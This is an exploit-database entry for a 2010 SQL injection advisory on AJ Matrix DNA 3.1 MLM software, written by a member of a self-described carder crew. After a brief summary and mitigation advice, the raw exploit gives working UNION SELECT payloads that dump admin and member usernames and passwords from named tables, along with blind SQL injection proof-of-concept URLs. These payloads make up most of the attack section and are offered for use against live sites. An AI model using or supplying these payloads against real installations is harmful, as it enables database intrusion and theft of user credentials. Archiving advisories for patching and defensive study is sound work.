AJ Matrix v3.1 (id) Multiple SQL Injection Vulnerability

vendor:

AJ Matrix DNA

by:

v3n0m

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: AJ Matrix DNA

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:ajsquare:aj_matrix_dna

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

AJ Matrix v3.1 (id) Multiple SQL Injection Vulnerability

AJ Matrix DNA is the world's leading MLM software solution for all MLM and affiliate programs. It is vulnerable to multiple SQL injection attacks, which can be exploited to extract sensitive information from the database. The exploit involves sending malicious SQL queries to the vulnerable parameter 'id' in the URL. An attacker can use the 'union' operator to combine the results of two or more SELECT statements into a single result set.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
        AJ Matrix v3.1 (id) Multiple SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: April, 23-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: AJ Matrix DNA
Vendor  	: http://www.ajsquare.com/
Price		: $2499.00 USD
Version 	: 3.1 Other versions may also be affected
Google Dork	: Use your brain & imagination :)

AJ Matrix DNA is the world's leading MLM software solution for all MLM and affiliate programs. 
Offering the quality software packages at a fraction of the cost. Our Matrix DNA Software is 
the right solution for any sized business.
----------------------------------------------------------------

Exploit:
~~~~~~~

-99999+union+all+select+0,0,group_concat(admin_username,char(58),admin_password)v3n0m,0,0+from+ajmatrix_admin_table--

-99999+union+all+select+0,0,group_concat(members_username,char(58),members_password)v3n0m,0,0+from+ajmatrix_members_table--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/?do=cms&action=news&id=[SQLi]


Blind SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://127.0.0.1/[path]/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=4 << false
----------------------------------------------------------------

Shoutz:
~~~~

- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [gw suka martabak keju ur...],mywisdom,yadoy666,udhit
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [Mizz You...Mizz You...Mizz You... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------